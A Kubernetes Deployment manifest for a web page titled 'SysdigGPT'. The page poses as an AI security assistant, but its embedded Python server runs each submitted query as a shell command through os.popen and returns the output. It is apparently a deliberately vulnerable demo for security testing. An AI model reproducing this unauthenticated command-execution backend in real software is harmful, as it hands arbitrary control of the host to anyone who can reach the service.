apiVersion: apps/v1
kind: Deployment
metadata:
  name: tensorflow
spec:
  replicas: 1
  selector:
    matchLabels:
      app: tensorflow
  template:
    metadata:
      labels:
        app: tensorflow
    spec:
      containers:
      - name: tensorflow
        image: tensorflow/tensorflow:latest
        ports:
        - containerPort: 8080
        command: ["sh", "-c"]
        args: [
          "echo '<!DOCTYPE html><html><head><style>body { display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; font-family: Arial, sans-serif; background-color: #B2FE67; position: relative; } #content { text-align: center; } input[type=text], button { margin-top: 20px; padding: 10px; width: 350px; font-size: 16px; height: 50px; box-sizing: border-box; } #message { margin-top: 20px; color: #555; } footer { position: fixed; bottom: 0; width: 100%; text-align: center; margin: 10px 0; font-size: 14px; } </style></head><body><div id=\"content\"><h1>SysdigGPT</h1><form id=\"queryForm\"><input type=\"text\" placeholder=\"Ask me anything about AI Security\" name=\"userQuery\"><button type=\"submit\">Submit</button><div id=\"message\"></div></form></div><footer>Built for fun by <b>Nigel Douglas</b></footer><script>document.getElementById('queryForm').addEventListener('submit', function(event) { event.preventDefault(); const userQuery = document.querySelector('[name=\\\"userQuery\\\"]').value; if (!userQuery) { document.getElementById('message').textContent = 'Please enter a query.'; return; } console.log('Sending POST request with:', userQuery); fetch('/execute', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ command: userQuery }) }).then(response => response.json()).then(data => { console.log('Response:', data); document.getElementById('message').textContent = data.output; }).catch(error => { document.getElementById('message').textContent = 'Error in execution'; console.error('Error:', error); }); });</script></body></html>' > /usr/share/html/index.html && \
          echo '#!/usr/bin/env python3\nimport http.server\nimport socketserver\nimport os\nimport json\nclass ServerHandler(http.server.SimpleHTTPRequestHandler):\n    def do_POST(self):\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers[\"Content-Length\"])\n        post_data = self.rfile.read(length)\n        print(\"Received POST data:\", post_data)\n        print(\"Content length reported:\", length)\n        if not post_data:\n            self.wfile.write(json.dumps({\"output\": \"Empty POST data received\"}).encode())\n            return\n        try:\n            message = json.loads(post_data)\n            if \"command\" in message:\n                response = os.popen(message[\"command\"]).read()\n                self.wfile.write(json.dumps({\"output\": response}).encode())\n            else:\n                self.wfile.write(json.dumps({\"output\": \"Command not found\"}).encode())\n        except json.JSONDecodeError as e:\n            self.wfile.write(json.dumps({\"output\": \"Invalid JSON: \" + str(e)}).encode())\nserver = socketserver.TCPServer((\"\", 8080), ServerHandler)\nserver.serve_forever()' > /usr/share/html/server.py && \
          cd /usr/share/html && \
          python3 server.py"
        ]
        volumeMounts:
        - name: html-volume
          mountPath: /usr/share/html
      volumes:
      - name: html-volume
        emptyDir: {}
